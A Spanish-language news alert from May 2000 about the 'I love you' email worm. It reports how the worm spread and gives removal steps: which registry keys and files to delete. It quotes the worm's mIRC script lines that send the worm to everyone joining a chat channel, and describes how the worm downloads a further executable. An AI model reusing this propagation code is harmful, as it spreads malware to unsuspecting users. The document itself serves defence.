Noticias
04/05/2000
Virus
Si reciben un mail con este SUBJECT O ASUNTO
I love you y con un attach
"Love-letter-for-you.Txt.Vbs." "Carta de amor para ti.Txt".
ELIMÍNENLO DE INMEDIATO
Detalle a continuación
| Virus
informático provoca estragos con promesa de amor Un nuevo virus computacional, detectado apenas ayer miércoles en Asia, está infectando a computadoras alrededor de todo el mundo. |
Fuente: Notimex | 12:57 Hrs Dallas, EU.- Un nuevo virus computacional, detectado apenas ayer miércoles en Asia, está infectando a computadoras alrededor de todo el mundo, provocando problemas a vastas redes informáticas, advirtieron hoy especialistas. El virus, clasificado como del tipo Melissa por estar contenido en un correo electrónico que al abrirse es capaz de auto reproducirse y enviarse a si mismo, fue detectado en las últimas horas en Asia, el Reino Unidos y Estados Unidos. El virus llega a las computadoras personales y a las redes enlazadas a internet como un correo identificado con la leyenda "I love you" (Te amo). Expertos en computación señalaron que una vez que los usuarios abren el mensaje, el virus destruye gráficas, sonidos y otro tipo de documentos guardados en la computadora. Un vocero de la compañía de productos antivirus Symantec Corp. Dijo este jueves a la agencia noticiosa especializada "Zdnet" que el virus "parece estar ampliamente difundido". El vocero indicó que cuando menos cuatro grandes corporaciones europeas presentan serios problemas con sus sistemas de correos electrónicos debido a la presencia del virus. El nuevo germen computacional está sorprendiendo a los especialistas debido a la velocidad con la que se está esparciendo por el mundo, sin que se conozca hasta ahora la forma de frenarlo. La compañía de información financiera Dow Jones reportó que el virus afectó sus operaciones en Hong Kong y Singapur y aparentemente dañó también a los sistemas de bancos y de empresas de relaciones públicas en Asia. Zdnet informó que existen reportes de que el virus comenzó a esparcirse esta mañana en Estados Unidos. La comañía Symantec reportó haber recibido unos mil reportes de infecciones alrededor del mundo. El virus, denominado por Symentec como "VBS.Loveletter.A" utiliza el programa de correos electrónicos "Microsoft Outlook" para reproducirse y enviarse a si mismo con el mensaje "revisa amablemente el mensaje unido a la carta de amor que proviene de mí". El nombre del mensaje que acompaña al correo electrónico es "Love-letter-for-you.Txt.Vbs." "Carta de amor para ti.Txt". Una vez que el mensaje unido al correo electrónico es abierto, el virus comienza a reproducirse, agregando archivos a la computadora del usuario. El virus es identificado como del tipo Melissa, nombre con el que se le conoce al primer germen computacional que apareció en forma de correo electrónico con capacidad de reproducirse y auto enviarse. El Melissa atrajo la atención mundial cuando apareció en marzo de 1999, poniendo en alerta sobre el problema de los virus computacionales y su rápida difusión a través de la internet. El melissa y los virus que lo imitan se apoderan en forma automática de las direcciones electrónicas que encuentran en la memoria de la computadora y se reproduce rápidamente enviando hasta 50 copias o más de si mismo a otros usuarios de correo. De origen filipino, el virus ha afectado a empresas de Rusia, Reino Unido, Alemania y España, donde han comunicado su impacto empresas de comunicación como el diario El País, la cadena Ser, la proveedora de antivirus Panda, la televisora privada Telecinco y CNN Plus. Diversos medios han informado sobre este virus alertando que si se recibe lo único que se debe hacer es eliminarlo de una vez. |
05/05/2000
Como eliminar el virus (solo para usuarios expertos)
El virus crea las siguientes
claves en el registro, que deberán ser borradas para evitar que el virus se
ejecute en forma automática más iniciar el sistema.
HKEY_LOCAL_MACHINE\Software\MIcrosoft\Windows\Current
Version\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\MIcrosoft\Windows\Current Version\RunService\Win32.DLL
HKEY_LOCAL_MACHINE\Software\MIcrosoft\Windows\Current Version\RunService\Win32.DLL
También será necesario borrar
los archivos:
WIN32DLL.VBS
ubicado en el directorio de Windows (por defecto\ Windows)
ubicado en el directorio de Windows (por defecto\ Windows)
MSKERNEL32.VBS
LOVE-LETTER-FOR-YOU.VBS
ubicado en el directorio de sistema (por defecto \WINDOWS\SYSTEM)
LOVE-LETTER-FOR-YOU.VBS
ubicado en el directorio de sistema (por defecto \WINDOWS\SYSTEM)
El gusano modifica la página de
inicio de Internet Explorer con una de las 4 direcciones, que elige según
un número aleatorio, bajo el dominio http://www.skynet.net.
Estas direcciones apuntan al fichero WIN-BUGSFIX.EXE, una vez descargado
modifica el registro de Windows para que este ejecutable sea lanzado en cada
inicio del sistema y modifica de nuevo la configuración de Internet
Explorer situando en esta ocasión una página en blanco como inicio.
Si el " maldito
gusano", consiguió realizar el paso anterior también deberemos borrar
el archivo:
WIN-BUGSFIX.EXE
Ubicado en el directorio de descarga de Internet Explorer
WIN-BUGSFIX.EXE
Ubicado en el directorio de descarga de Internet Explorer
y la entrada del registro:
HKEY_LOCAL_MACHINE\Software\MIcrosoft\Windows\Current Version\Run\WINBUGSFIX.EXE
HKEY_LOCAL_MACHINE\Software\MIcrosoft\Windows\Current Version\Run\WINBUGSFIX.EXE
El gusano también detecta la
presencia de programa de mIRC, buscando algunos de los siguientes archivos
"mirc32.exe", "mlink32.exe", "mirc.ini" y
"script.ini". En caso de que se encuentren en el sistema el gusano
escribe en el mismo directorio su propio archivo SCRIPT.INI donde podemos
encontrar, entre líneas, las siguientes instrucciones:
n0=on l: JOIN: #:{
n1=/if ($nick == $me) { halt }
n2= /.dcc.send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
n3=}
n0=on l: JOIN: #:{
n1=/if ($nick == $me) { halt }
n2= /.dcc.send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
n3=}
Las cuales provocan que el
gusano se autoenvíe DCC a través del archivo LOVE-LETTER-FOR-YOU.HTM,
a todos los usuarios de IRC que entren en el mismo canal de conversación
donde se encuentre el usuario infectado.
En este caso debemos borrar los
archivos.
LOVE-LETTER-FOR-YOU,HTM
ubicado en el directorio de sistema (por defecto \WINDOWS\SYSTEM)
ubicado en el directorio de sistema (por defecto \WINDOWS\SYSTEM)
SCRIPT.INI (si contiene las
instrucciones comentadas)
ubicado en el directorio de mIRC.
ubicado en el directorio de mIRC.
El virus sobrescribe con su código
los archivos con extensiones, VBS Y VBE. Elimina los archivos con
extensiones JS, JSE, CSS, WSH, SCT y HTA, y crea otros con el mismo nombre y
extensión. VBS en el que introduce su código. También localiza los
archvios con extensión JPG, JPEG, MP3 Y MP2, los elimina, y crea otros
donde el nuevo nombre está formado por el nombre y la extensión anterior más
VBS como nueva extensión real.
Por último recordar la
posibilidad de que este mismo gusano pueda presentarse bajo otros nombres de
ficheros con tan sólo unas simples modificaciones en su código.
05/05/2000
El virus I love you ya cambio de nombre
Podremos detectarlo como JOKE, también hay novedades respecto de los antivirus
la empresa symantec, ya dispone de una actualización para combatir el mismo